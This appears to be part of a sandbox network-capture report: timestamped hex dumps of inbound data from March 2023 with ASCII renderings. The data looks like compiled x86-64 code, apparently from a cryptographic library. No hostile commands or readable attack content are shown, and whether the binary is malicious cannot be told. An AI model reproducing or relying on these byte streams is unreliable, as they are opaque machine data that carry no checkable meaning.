                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2561INData Raw: 31 c0 83 e1 08 74 0b 8b 92 dc 00 00 00 f6 c2 07 75 61 c3 0f 1f 84 00 00 00 00 00 83 e1 08 74 1b 8b 82 dc 00 00 00 a8 20 75 11 a8 80 75 55 31 c0 c3 66 2e 0f 1f 84 00 00 00 00 00 b8 01 00 00 00 48 b9 02 00 00 00 c0 00 00 00 48 23 8a d0 00 00 00 ba 00 00 00 00 48 83 f9 02 0f 44 c2 c3 0f 1f 44 00 00 c1 e9 04 89 c8 83 e0 01 c3 0f 1f 80 00 00 00 00 83 e2 02 f7 da 19 c0 83 e0 05 c3 0f 1f 44 00 00 b8 02 00 00 00 eb b6 90 b8 03 00 00 00 c3 66 2e 0f 1f 84 00 00 00 00 00 41 54 48 83 ec 20 49 89 d4 44 89 c0 45 85 c0 75 4f 8b 92 d0 00 00 00 f6 c2 02 75 24 83 e2 04 74 0f 41 83 bc 24 d8 00 00 00 40 0f 84 a0 00 00 00 48 83 c4 20 41 5c c3 66 0f 1f 84 00 00 00 00 00 41 8b 8c 24 d4 00 00 00 f7 c1 3f ff ff ff 75 e0 81 e1 c0 00 00 00 75 c4 eb d6 66 0f 1f 44 00 00 48 ba 02 00
                                                                                                                                                                                                                    Data Ascii: 1tuat uuU1f.HH#HDDDf.ATH IDEuOu$tA$@H A\fA$?uufDH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2577INData Raw: 00 00 00 4c 8d 0d 21 67 44 00 41 b8 6d 00 00 00 45 31 e4 ba 6c 00 00 00 b9 22 00 00 00 e8 c9 f3 f5 ff e9 d5 fe ff ff 0f 1f 40 00 41 b8 41 00 00 00 ba 6c 00 00 00 b9 22 00 00 00 c7 44 24 20 cf 00 00 00 4c 8d 0d e1 66 44 00 e8 9c f3 f5 ff e9 a8 fe ff ff 0f 1f 80 00 00 00 00 41 56 41 55 41 54 53 48 83 ec 38 41 bc 01 00 00 00 49 89 cd 4c 89 c3 48 89 d1 48 85 d2 0f 84 94 00 00 00 31 d2 e8 a6 9e f1 ff 49 89 c4 48 85 c0 0f 84 9a 00 00 00 48 89 c1 e8 e2 da f2 ff 4c 89 e1 83 f8 7f 0f 8e c6 00 00 00 e8 01 f2 ff ff 49 89 c6 4d 85 f6 74 79 4c 89 e1 e8 f1 dc f2 ff 41 80 3e 00 0f 84 b7 00 00 00 4c 89 f2 31 c0 eb 0b 3d 00 00 00 80 0f 84 a5 00 00 00 48 83 c2 01 83 c0 01 80 3a 00 75 e9 41 89 c0 41 81 e0 ff ff ff 7f 4c 89 f2 4c 89 e9 49 89 d9 e8 f1 e5 ff ff 41 b8 03 01 00
                                                                                                                                                                                                                    Data Ascii: L!gDAmE1l"@AAl"D$ LfDAVAUATSH8AILHH1IHHLIMtyLA>L1=H:uAALLIA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2593INData Raw: 44 53 53 31 0f 84 51 ff ff ff 48 8d 5c 24 56 4c 8d 05 5f 2a 44 00 ba 0a 00 00 00 48 89 d9 e8 48 36 f2 ff 8b 0d 9e 0a 57 00 85 c9 0f 84 aa 05 00 00 c7 44 24 20 c9 02 00 00 41 b8 77 00 00 00 ba 73 00 00 00 4c 8d 0d 60 27 44 00 e8 9b b3 f5 ff 49 89 d8 48 8d 15 1f 2a 44 00 e9 d0 fe ff ff 0f 1f 40 00 8b 0d 5e 0a 57 00 85 c9 0f 84 d2 05 00 00 41 b8 7b 00 00 00 ba 73 00 00 00 48 8d 5c 24 56 c7 44 24 20 88 02 00 00 4c 8d 0d 1b 27 44 00 e8 56 b3 f5 ff ff 15 64 d5 87 00 4c 8d 05 6a 27 44 00 ba 0a 00 00 00 48 89 d9 41 89 c1 e8 b9 35 f2 ff 49 89 d8 48 8d 15 54 27 44 00 e9 6e fe ff ff 66 2e 0f 1f 84 00 00 00 00 00 8b 0d f6 09 57 00 85 c9 0f 84 c2 01 00 00 c7 44 24 20 7d 02 00 00 4c 8d 0d c3 26 44 00 41 b8 7c 00 00 00 45 31 ed ba 73 00 00 00 48 8d 5c 24 56 e8 eb b2 f5
                                                                                                                                                                                                                    Data Ascii: DSS1QH\$VL_*DHH6WD$ AwsL`'DIH*D@^WA{sH\$VD$ L'DVdLj'DHA5IHT'Dnf.WD$ }L&DA|E1sH\$V
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2609INData Raw: c8 c5 f8 10 46 28 4d 8d 7c 1f 10 c5 7a 6f 74 24 20 41 0f 18 4e 0f 41 0f 18 4f 0f 83 f8 0b 0f 82 b6 00 00 00 c4 e2 69 dc d1 c4 e2 61 dc d9 c4 e2 59 dc e1 c4 e2 51 dc e9 c4 e2 49 dc f1 c4 e2 41 dc f9 c4 62 39 dc c1 c4 62 31 dc c9 c5 f8 10 4e 38 c4 e2 69 dc d0 c4 e2 61 dc d8 c4 e2 59 dc e0 c4 e2 51 dc e8 c4 e2 49 dc f0 c4 e2 41 dc f8 c4 62 39 dc c0 c4 62 31 dc c8 c5 f8 10 46 48 74 5a c4 e2 69 dc d1 c4 e2 61 dc d9 c4 e2 59 dc e1 c4 e2 51 dc e9 c4 e2 49 dc f1 c4 e2 41 dc f9 c4 62 39 dc c1 c4 62 31 dc c9 c5 f8 10 4e 58 c4 e2 69 dc d0 c4 e2 61 dc d8 c4 e2 59 dc e0 c4 e2 51 dc e8 c4 e2 49 dc f0 c4 e2 41 dc f8 c4 62 39 dc c0 c4 62 31 dc c8 c5 f8 10 46 68 c4 e2 69 dc d1 c4 41 01 ef ff c4 e2 61 dc d9 c4 e2 59 dc e1 c4 41 09 66 ff c4 e2 51 dc e9 c4 e2 49 dc f1 c4 41
                                                                                                                                                                                                                    Data Ascii: F(M|zot$ ANAOiaYQIAb9b1N8iaYQIAb9b1FHtZiaYQIAb9b1NXiaYQIAb9b1FhiAaYAfQIA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2625INData Raw: 41 31 dd 44 03 44 24 0c 44 89 ce 41 c1 ce 0b 41 31 d4 44 31 d6 41 c1 cd 06 45 01 e0 41 21 f7 45 31 ce 45 01 e8 45 31 d7 44 01 c0 41 c1 ce 02 45 01 f8 41 89 c5 45 01 c6 c5 f9 7f 34 24 c4 e3 69 0f e1 04 41 c1 cd 0e 45 89 f0 c4 e3 79 0f fb 04 41 89 dc 41 31 c5 8f e8 78 c2 ec 0e 41 c1 ce 09 41 31 cc c5 d9 72 d4 03 41 c1 cd 05 45 31 c6 c5 f1 fe cf 41 21 c4 c4 42 31 dc ca c5 7a 6f 57 c0 41 31 c5 03 54 24 10 45 89 c7 8f e8 78 c2 f5 0b 41 c1 ce 0b 41 31 cc c5 d9 ef e5 45 31 cf 41 c1 cd 06 44 01 e2 44 21 fe 8f e8 78 c2 f8 0d 45 31 c6 44 01 ea c5 d9 ef e6 44 31 ce 41 01 d3 c5 c9 72 d0 0a 41 c1 ce 02 01 f2 c5 f1 fe cc 45 89 dd 41 01 d6 8f e8 78 c2 ef 02 41 c1 cd 0e 44 89 f2 c5 c1 ef fe 41 89 c4 45 31 dd 41 c1 ce 09 41 31 dc c5 c1 ef fd 41 c1 cd 05 41 31 d6 45 21 dc
                                                                                                                                                                                                                    Data Ascii: A1DD$DAA1D1AEA!E1EE1DAEAE4$iAEyAA1xAA1rAE1A!B1zoWA1T$ExAA1E1ADD!xE1DD1ArAEAxADAE1AA1AA1E!
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2641INData Raw: 12 0f 10 61 60 66 0f 38 dc f5 0f 10 69 70 66 0f 38 dc f4 66 0f 38 dd f5 0f 10 61 a0 90 0f 38 cb d1 66 0f 70 c0 0e 66 41 0f 6f dc 66 41 0f 3a 0f db 04 66 44 0f fe eb 44 0f 10 77 30 45 0f 57 f7 0f 11 74 3e 20 41 0f 57 f6 0f 10 69 b0 66 0f 38 dc f4 0f 10 61 c0 66 0f 38 dc f5 0f 38 cb ca 66 0f 6f 80 40 01 00 00 66 41 0f fe c4 45 0f 38 cd ec 66 0f 6f df 0f 10 69 d0 66 0f 38 dc f4 0f 38 cb d1 66 0f 70 c0 0e 0f 10 61 e0 66 0f 38 dc f5 0f 38 cb ca 66 0f 6f 80 60 01 00 00 66 41 0f fe c5 0f 10 69 f0 66 0f 38 dc f4 0f 10 21 66 0f 38 dc f5 0f 38 cb d1 66 0f 70 c0 0e 0f 10 69 10 66 0f 38 dc f4 0f 38 cb ca 0f 10 61 20 66 0f 38 dc f5 0f 10 69 30 66 0f 38 dc f4 41 83 fb 0b 72 26 0f 10 61 40 66 0f 38 dc f5 0f 10 69 50 66 0f 38 dc f4 74 12 0f 10 61 60 66 0f 38 dc f5 0f 10
                                                                                                                                                                                                                    Data Ascii: a`f8ipf8f8a8fpfAofA:fDDw0EWt> AWif8af88fo@fAE8foif88fpaf88fo`fAif8!f88fpif88a f8i0f8Ar&a@f8iPf8ta`f8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2657INData Raw: 0f 38 de d1 66 0f 38 de d9 66 0f 38 de e1 66 0f 38 de e9 66 0f 38 de f1 66 0f 38 de f9 66 44 0f 38 de c1 66 44 0f 38 de c9 0f 10 49 40 90 66 0f 38 de d0 66 0f 38 de d8 66 0f 38 de e0 66 0f 38 de e8 66 0f 38 de f0 66 0f 38 de f8 66 44 0f 38 de c0 66 44 0f 38 de c8 0f 10 41 50 74 6d 66 0f 38 de d1 66 0f 38 de d9 66 0f 38 de e1 66 0f 38 de e9 66 0f 38 de f1 66 0f 38 de f9 66 44 0f 38 de c1 66 44 0f 38 de c9 0f 10 49 60 90 66 0f 38 de d0 66 0f 38 de d8 66 0f 38 de e0 66 0f 38 de e8 66 0f 38 de f0 66 0f 38 de f8 66 44 0f 38 de c0 66 44 0f 38 de c8 0f 10 41 70 eb 0e 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 66 0f 38 de d1 66 0f 38 de d9 66 44 0f ef d0 66 44 0f ef d8 66 0f 38 de e1 66 0f 38 de e9 66 44 0f ef e0 66 44 0f ef e8 66 0f 38 de f1 66 0f 38 de f9 66 44
                                                                                                                                                                                                                    Data Ascii: 8f8f8f8f8f8fD8fD8I@f8f8f8f8f8f8fD8fD8APtmf8f8f8f8f8f8fD8fD8I`f8f8f8f8f8f8fD8fD8Apff.f8f8fDfDf8f8fDfDf8f8fD
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2673INData Raw: fe ff ff c7 44 24 20 b1 00 00 00 41 b8 9b 00 00 00 ba 6b 00 00 00 b9 0d 00 00 00 4c 8d 0d a9 27 43 00 e8 c4 73 f4 ff e9 0b ff ff ff 0f 1f 80 00 00 00 00 c7 44 24 20 78 00 00 00 41 b8 41 00 00 00 ba 6b 00 00 00 b9 0d 00 00 00 4c 8d 0d 79 27 43 00 e8 94 73 f4 ff e9 db fe ff ff c7 44 24 20 7d 00 00 00 e9 b2 fe ff ff 41 b8 7b 00 00 00 ba 6b 00 00 00 b9 0d 00 00 00 c7 44 24 20 9c 00 00 00 4c 8d 0d 43 27 43 00 e8 5e 73 f4 ff e9 a5 fe ff ff c7 44 24 20 82 00 00 00 e9 6c ff ff ff c7 44 24 20 be 00 00 00 eb 92 c7 44 24 20 d5 00 00 00 e9 55 ff ff ff c7 44 24 20 e1 00 00 00 e9 48 ff ff ff 0f 1f 84 00 00 00 00 00 41 54 53 48 83 ec 38 4c 89 c1 48 89 d3 48 8d 54 24 20 4d 89 cc 48 c7 44 24 20 00 00 00 00 e8 3d fc ff ff 41 89 c0 85 c0 78 36 48 8b 44 24 20 4c 89 e1 48 8d
                                                                                                                                                                                                                    Data Ascii: D$ AkL'CsD$ xAAkLy'CsD$ }A{kD$ LC'C^sD$ lD$ D$ UD$ HATSH8LHHT$ MHD$ =Ax6HD$ LH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2689INData Raw: 03 64 24 70 85 c0 0f 84 44 03 00 00 8b 7c 24 40 31 db eb 12 0f 1f 80 00 00 00 00 83 c3 01 39 df 0f 84 2a 03 00 00 4d 89 e9 41 b8 01 00 00 00 ba 01 00 00 00 4c 89 f1 e8 97 d1 19 00 48 83 f8 01 74 d9 41 bc ff ff ff ff 44 89 e0 48 81 c4 d8 00 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 45 31 e4 45 85 c0 45 0f 49 e0 7e 3c 48 85 c9 74 37 31 db 48 8d 35 7b e8 42 00 eb 0c 0f 1f 40 00 83 c3 01 41 39 dc 7e 20 4d 89 e9 41 b8 01 00 00 00 ba 01 00 00 00 48 89 f1 e8 32 d1 19 00 48 83 f8 01 75 9b eb da 66 90 8b 84 24 38 01 00 00 25 00 00 0f 00 3d 00 00 03 00 0f 84 b7 04 00 00 0f 87 d3 03 00 00 3d 00 00 01 00 0f 84 68 04 00 00 3d 00 00 02 00 0f 85 64 ff ff ff 48 8d 05 fd e7 42 00 c7 44 24 44 03 00 00 00 48 89 44 24 50 48 8d 05 f3 e7 42 00 48 c7 44 24 58 03
                                                                                                                                                                                                                    Data Ascii: d$pD|$@19*MALHtADH[^_]A\A]A^A_@E1EEI~<Ht71H5{B@A9~ MAH2Huf$8%==h=dHBD$DHD$PHBHD$X
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2705INData Raw: 75 e9 48 8b 0b 4d 89 f0 4c 89 fa e8 eb 92 19 00 85 c0 75 d7 8b 53 0c 83 fa ff 74 37 41 89 d0 41 81 e0 00 00 01 00 0f 85 87 00 00 00 89 55 08 4c 89 65 10 4d 85 e4 0f 84 aa 00 00 00 44 89 c0 48 83 c4 58 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 41 b8 c2 00 00 00 ba b1 00 00 00 b9 0d 00 00 00 c7 44 24 20 0a 01 00 00 4c 8d 0d 9a ae 42 00 e8 74 f3 f3 ff 4d 89 f8 b9 02 00 00 00 48 8d 15 e3 ae 42 00 e8 80 11 f4 ff 41 b8 ff ff ff ff eb a9 0f 1f 84 00 00 00 00 00 c7 44 24 3c 00 00 00 00 89 f7 45 31 e4 e9 1f ff ff ff 66 0f 1f 44 00 00 81 ea 01 00 01 00 83 fa 07 0f 87 c7 00 00 00 48 8d 0d ba ae 42 00 48 63 14 91 48 01 ca ff e2 66 0f 1f 84 00 00 00 00 00 41 b8 ff ff ff ff e9 56 ff ff ff 48 63 ff 41 80 3c 3f 00 0f 84 48 ff ff ff 41 b8 bd 00 00 00 ba b1 00 00 00
                                                                                                                                                                                                                    Data Ascii: uHMLuSt7AAULeMDHX[^_]A\A]A^A_AD$ LBtMHBAD$<E1fDHBHcHfAVHcA<?HA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2721INData Raw: 51 28 c3 0f 1f 84 00 00 00 00 00 48 89 d0 48 89 ca 49 f7 f0 c3 66 0f 1f 44 00 00 31 c0 49 89 ca 44 89 c9 45 85 c9 7e 30 4d 29 c9 eb 0e 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 4c 8b 0c c2 4d 13 0c c0 4d 89 0c c2 48 8d 40 01 ff c9 75 ec 4d 19 c9 4c 89 c8 83 e0 01 c3 66 90 31 c0 49 89 ca 44 89 c9 45 85 c9 7e 30 4d 29 c9 eb 0e 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 4c 8b 0c c2 4d 1b 0c c0 4d 89 0c c2 48 8d 40 01 ff c9 75 ec 4d 19 c9 4c 89 c8 83 e0 01 c3 66 90 56 53 45 31 db 4c 89 db 4c 89 de 48 8b 02 49 89 d1 49 89 ca 4c 89 d9 49 f7 20 48 01 c3 48 11 d6 48 83 d1 00 49 89 1a 4c 89 db 49 8b 01 49 f7 60 08 48 01 c6 48 11 d1 48 83 d3 00 49 8b 41 08 49 f7 20 48 01 c6 48 11 d1 48 83 d3 00 49 89 72 08 4c 89 de 49 8b 41 10 49 f7 20 48 01 c1 48 11 d3 48 83 d6 00
                                                                                                                                                                                                                    Data Ascii: Q(HHIfD1IDE~0M)ff.LMMH@uMLf1IDE~0M)ff.LMMH@uMLfVSE1LLHIILI HHHILII`HHHIAI HHHIrLIAI HHH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2737INData Raw: 89 e0 4c 89 74 24 20 48 89 ca e8 fc bd f0 ff 85 f6 0f 8f 44 ff ff ff 48 8b 4d c0 4c 89 74 24 20 45 31 c0 49 89 f9 89 5c 24 28 4c 8d 6d c0 48 89 ca e8 35 d8 f0 ff 4c 89 e9 89 5d c8 41 89 c6 e8 f7 76 f0 ff 45 85 f6 0f 85 ee 06 00 00 4c 8b 4d 70 4c 8b 45 b8 4c 89 ea 45 31 f6 48 8b 4d 50 e8 97 7d f0 ff 85 c0 41 0f 95 c6 e9 47 01 00 00 0f 1f 40 00 45 31 f6 48 83 7d 78 00 0f 84 f6 00 00 00 48 8b 4d 70 e8 21 dd ff ff 44 89 f0 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 0f 1f 44 00 00 ba 01 00 00 00 4c 89 e9 e8 cb 72 f0 ff 85 c0 74 47 48 8b 4d 50 31 d2 41 be 01 00 00 00 e8 c6 62 f0 ff eb c3 0f 1f 40 00 41 b8 66 00 00 00 ba 7c 00 00 00 b9 03 00 00 00 c7 44 24 20 66 02 00 00 4c 8d 0d e1 3f 42 00 e8 fc 72 f3 ff eb 99 66 2e 0f 1f 84 00 00 00 00 00 48 8b 4d 50
                                                                                                                                                                                                                    Data Ascii: Lt$ HDHMLt$ E1I\$(LmH5L]AvELMpLELE1HMP}AG@E1H}xHMp!DHe[^_A\A]A^A_]DLrtGHMP1Ab@Af|D$ fL?Brf.HMP
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2753INData Raw: 87 02 00 00 c7 44 24 44 04 00 00 00 83 bc 24 d8 00 00 00 01 7f 3d c7 44 24 20 42 00 00 00 4c 8d 0d 66 01 42 00 41 b8 76 00 00 00 ba 8d 00 00 00 45 31 ed b9 03 00 00 00 e8 ae 33 f3 ff e9 ce 02 00 00 66 0f 1f 84 00 00 00 00 00 c7 44 24 44 03 00 00 00 48 83 bc 24 e8 00 00 00 00 75 25 44 8b a4 24 e0 00 00 00 45 85 e4 74 18 83 bc 24 d8 00 00 00 05 7f 0e 83 bc 24 d8 00 00 00 03 0f 85 20 05 00 00 41 b8 4e 00 00 00 48 8d 15 fb 00 42 00 b9 00 10 00 00 e8 81 61 f5 ff 49 89 c4 48 85 c0 0f 84 35 02 00 00 e8 f0 99 ff ff 49 89 c6 48 85 c0 0f 84 24 02 00 00 48 89 c1 e8 bc 9b ff ff 4c 89 f1 e8 84 9d ff ff 49 89 c7 48 85 c0 0f 84 eb 03 00 00 83 bc 24 e0 00 00 00 01 c7 44 24 70 00 00 00 00 48 8d 35 c1 00 42 00 48 19 c0 4c 89 74 24 38 48 83 e0 fe 48 83 c0 03 83 bc 24 e0 00
                                                                                                                                                                                                                    Data Ascii: D$D$=D$ BLfBAvE13fD$DH$u%D$Et$$ ANHBaIH5IH$HLIH$D$pH5BHLt$8HH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2769INData Raw: 45 80 c4 c1 75 d4 ca 49 01 c2 c4 41 1d f4 75 c0 48 89 d0 49 0f af 45 88 c4 c1 6d d4 d6 c4 41 1d f4 5d e0 67 49 01 c3 67 48 89 d0 49 0f af 45 90 49 c1 ea 1d c4 c1 65 d4 db c4 41 1d f4 55 00 49 01 c4 4d 01 d3 c4 c1 5d d4 e2 c4 41 1d f4 75 20 4c 89 d8 0f af c1 c4 c1 55 d4 ee c4 41 1d f4 5d 40 25 ff ff ff 1f c4 c1 4d d4 f3 c4 41 1d f4 55 60 c4 c1 45 d4 fa c4 41 1d f4 b5 80 00 00 00 c5 79 6e e0 c4 41 3d d4 c6 c4 42 7d 59 e4 c4 41 15 f4 5d 98 c4 41 7e 6f 75 d8 48 89 c2 49 0f af 45 80 c4 c1 75 d4 cb c4 41 15 f4 55 b8 c4 41 7e 6f 5d f8 49 01 c3 48 89 d0 49 0f af 45 88 c4 c1 6d d4 d2 4c 01 e0 49 c1 eb 1d c4 41 0d f4 f5 c4 41 7e 6f 55 18 4c 01 d8 c4 c1 65 d4 de c4 41 25 f4 dd c4 41 7e 6f 75 38 67 49 89 c4 0f af c1 c4 c1 5d d4 e3 c4 41 2d f4 d5 c4 41 7e 6f 9d 58 00
                                                                                                                                                                                                                    Data Ascii: EuIAuHIEmA]gIgHIEIeAUIM]Au LUA]@%MAU`EAynA=B}YA]A~ouHIEuAUA~o]IHIEmLIAA~oULeA%A~ou8gI]A-A~oX
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2785INData Raw: 31 00 31 2f 2f 2f 00 cb cb 00 cb a8 a8 a8 00 2a 2a 00 2a b6 b6 b6 00 ad ad 00 ad 3c 3c 3c 00 0f 0f 00 0f 2b 2b 2b 00 ca ca 00 ca c1 c1 c1 00 70 70 00 70 ff ff ff 00 ff ff 00 ff c8 c8 c8 00 32 32 00 32 a5 a5 a5 00 69 69 00 69 20 20 20 00 08 08 00 08 89 89 89 00 62 62 00 62 00 00 00 00 00 00 00 00 90 90 90 00 24 24 00 24 47 47 47 00 d1 d1 00 d1 ef ef ef 00 fb fb 00 fb ea ea ea 00 ba ba 00 ba b7 b7 b7 00 ed ed 00 ed 15 15 15 00 45 45 00 45 06 06 06 00 81 81 00 81 cd cd cd 00 73 73 00 73 b5 b5 b5 00 6d 6d 00 6d 12 12 12 00 84 84 00 84 7e 7e 7e 00 9f 9f 00 9f bb bb bb 00 ee ee 00 ee 29 29 29 00 4a 4a 00 4a 0f 0f 0f 00 c3 c3 00 c3 b8 b8 b8 00 2e 2e 00 2e 07 07 07 00 c1 c1 00 c1 04 04 04 00 01 01 00 01 9b 9b 9b 00 e6 e6 00 e6 94 94 94 00 25 25 00 25 21 21 21 00
                                                                                                                                                                                                                    Data Ascii: 11///***<<<+++ppp222iii bbb$$$GGGEEEsssmmm~~~)))JJJ...%%%!!!
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2801INData Raw: e4 62 b1 55 48 fe ed 62 b1 4d 48 fe f6 62 b1 45 48 fe ff 62 f1 5d 48 62 d5 62 e1 4d 48 62 df 62 f1 5d 48 6a e5 62 f1 4d 48 6a f7 62 b1 ed 48 6c eb 62 b1 ed 48 6d d3 62 f1 dd 48 6c fe 62 f1 dd 48 6d e6 62 e3 75 48 43 dd 44 62 f3 75 48 43 ed ee 62 f3 6d 40 43 ca 44 62 f3 6d 40 43 d2 ee 62 e3 65 48 43 d7 44 62 f3 65 48 43 ff ee 62 f3 7d 48 43 dc 44 62 f3 7d 48 43 e4 ee 62 11 3d 48 fe c0 62 11 35 48 fe c9 62 11 2d 48 fe d2 62 11 25 48 fe db 62 d1 3d 48 62 f1 62 d1 2d 48 62 c3 62 51 3d 48 6a c1 62 51 2d 48 6a d3 62 71 cd 48 6c c8 62 f1 cd 48 6d f0 62 51 bd 48 6c da 62 51 bd 48 6d c2 62 11 1d 48 fe e4 62 11 15 48 fe ed 62 11 0d 48 fe f6 62 11 05 48 fe ff 62 51 1d 48 62 d5 62 d1 0d 48 62 c7 62 51 1d 48 6a e5 62 51 0d 48 6a f7 62 71 ad 48 6c e8 62 71 ad 48 6d d0
                                                                                                                                                                                                                    Data Ascii: bUHbMHbEHb]HbbMHbb]HjbMHjbHlbHmbHlbHmbuHCDbuHCbm@CDbm@CbeHCDbeHCb}HCDb}HCb=Hb5Hb-Hb%Hb=Hbb-HbbQ=HjbQ-HjbqHlbHmbQHlbQHmbHbHbHbHbQHbbHbbQHjbQHjbqHlbqHm
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2817INData Raw: 5b 5e 41 5c 41 5d 41 5e c3 66 90 49 8b 45 08 48 8b 58 10 48 83 c3 08 e9 4f ff ff ff 0f 1f 80 00 00 00 00 ba 01 04 00 00 4c 89 e1 e8 bb f9 ee ff 49 89 c6 48 85 c0 0f 84 2f 01 00 00 4c 8d 4c 24 38 45 31 c0 ba 03 00 00 00 48 89 c1 e8 aa ef ee ff ba 00 02 00 00 4c 89 f1 89 c6 e8 eb db ee ff 45 31 c9 45 31 c0 ba 82 00 00 00 4c 89 f1 e8 88 ef ee ff 48 8b 54 24 38 48 8b 0b 41 89 f0 e8 c8 01 ee ff 48 8b 03 83 60 10 df e9 ee fe ff ff 0f 1f 40 00 49 8d 5d 08 e9 cf fe ff ff 0f 1f 80 00 00 00 00 49 8b 45 08 48 8b 58 08 48 83 c3 10 e9 b7 fe ff ff 0f 1f 80 00 00 00 00 49 8b 45 08 48 8b 58 18 48 83 c3 10 e9 9f fe ff ff 0f 1f 80 00 00 00 00 45 31 c0 4c 89 e2 4c 89 e9 48 83 c4 40 5b 5e 41 5c 41 5d 41 5e e9 0e 56 08 00 66 0f 1f 44 00 00 4c 89 e2 4c 89 e9 48 83 c4 40 5b 5e
                                                                                                                                                                                                                    Data Ascii: [^A\A]A^fIEHXHOLIH/LL$8E1HLE1E1LHT$8HAH`@I]IEHXHIEHXHE1LLH@[^A\A]A^VfDLLH@[^
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2833INData Raw: 00 00 c7 44 24 20 00 00 00 00 41 b8 f8 00 00 00 e8 f6 a7 f3 ff 85 c0 0f 8e 6e fe ff ff 66 0f 1f 44 00 00 48 8b 4f 28 48 85 c9 0f 84 2b 04 00 00 4c 89 e2 e8 83 97 f9 ff 85 c0 0f 85 5f fe ff ff 0f 1f 00 c7 44 24 20 84 01 00 00 41 b8 41 00 00 00 ba 66 00 00 00 b9 2e 00 00 00 4c 8d 0d 09 09 41 00 e8 84 f3 f1 ff e9 1f fe ff ff 0f 1f 80 00 00 00 00 e8 e3 92 ff ff 48 89 c1 e8 eb 1a ee ff 49 89 46 08 49 89 c4 48 85 c0 0f 84 e5 03 00 00 c7 00 01 00 00 00 48 8b 58 10 b9 15 00 00 00 e8 97 0a f5 ff 49 8b 0e 48 89 03 49 8b 46 08 48 8b 40 10 c7 40 10 01 00 00 00 e8 4d 93 fd ff b9 16 00 00 00 e8 73 0a f5 ff 49 8b 7e 08 49 89 06 e9 ad fc ff ff 0f 1f 80 00 00 00 00 c7 07 03 00 00 00 e9 32 fd ff ff 0f 1f 44 00 00 c7 44 24 20 1a 00 00 00 4c 8d 0d 71 08 41 00 41 b8 6c 00 00
                                                                                                                                                                                                                    Data Ascii: D$ AnfDHO(H+L_D$ AAf.LAHIFIHHXIHIFH@@MsI~I2DD$ LqAAl
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2849INData Raw: 24 0c 44 8b 74 24 10 44 31 d9 c1 c9 04 41 89 c8 89 cf 41 c1 e8 02 c1 ef 0a 41 83 e0 3f 83 e7 3f 46 8b 84 80 00 01 00 00 44 33 84 b8 00 03 00 00 89 cf c1 e9 12 c1 ef 1a 83 e1 3f 44 33 84 b8 00 07 00 00 44 33 84 88 00 05 00 00 44 89 c1 31 d1 89 da c1 ea 1a 33 8c 90 00 06 00 00 89 da c1 ea 02 83 e2 3f 33 0c 90 89 da c1 eb 12 c1 ea 0a 83 e3 3f 83 e2 3f 33 8c 90 00 02 00 00 8b 54 24 14 33 8c 98 00 04 00 00 41 31 cc 31 ca 45 89 e0 89 d3 41 c1 c8 04 45 89 c4 44 89 c2 41 c1 ec 0a c1 ea 02 44 89 e7 45 89 c4 83 e2 3f 41 c1 e8 12 83 e7 3f 41 c1 ec 1a 8b 94 90 00 01 00 00 41 83 e0 3f 33 94 b8 00 03 00 00 44 89 e7 33 94 b8 00 07 00 00 42 33 94 80 00 05 00 00 44 31 da 41 89 db 41 c1 eb 1a 45 89 d8 41 89 db 41 c1 eb 02 42 33 94 80 00 06 00 00 45 89 d8 41 89 db c1 eb 12
                                                                                                                                                                                                                    Data Ascii: $Dt$D1AAA??FD3?D3D3D13?3??3T$3A11EAEDADE?A?AA?3D3B3D1AAEAAB3EA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2865INData Raw: 01 00 00 48 8d 15 c1 9f 40 00 48 63 f8 48 89 f9 e8 66 a0 f3 ff 49 89 c7 48 85 c0 0f 84 ba 00 00 00 4d 89 e8 4c 89 f2 48 89 c1 e8 4c 75 ef ff 85 c0 0f 8e a4 00 00 00 48 8b 43 40 48 8b 16 49 89 f9 4d 89 f8 4c 89 e1 48 89 44 24 38 48 8b 43 50 48 89 44 24 30 48 8b 43 48 48 89 44 24 28 48 8b 43 38 48 89 44 24 20 e8 9f cf 07 00 85 c0 74 6b 48 8b 43 58 48 89 06 b8 01 00 00 00 41 b9 da 01 00 00 48 89 fa 4c 89 f9 89 44 24 4c 4c 8d 05 38 9f 40 00 e8 d3 a3 f3 ff 8b 44 24 4c e9 85 fe ff ff 66 2e 0f 1f 84 00 00 00 00 00 4c 89 e9 e8 38 79 ef ff 48 98 48 89 06 b8 01 00 00 00 e9 64 fe ff ff 66 0f 1f 84 00 00 00 00 00 49 89 10 b8 01 00 00 00 e9 4e fe ff ff 0f 1f 00 31 c0 eb 9d 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 68 48 8b 59 28
                                                                                                                                                                                                                    Data Ascii: H@HcHfIHMLHLuHC@HIMLHD$8HCPHD$0HCHHD$(HC8HD$ tkHCXHAHLD$LL8@D$Lf.L8yHHdfIN1ff.AWAVAUATUWVSHhHY(
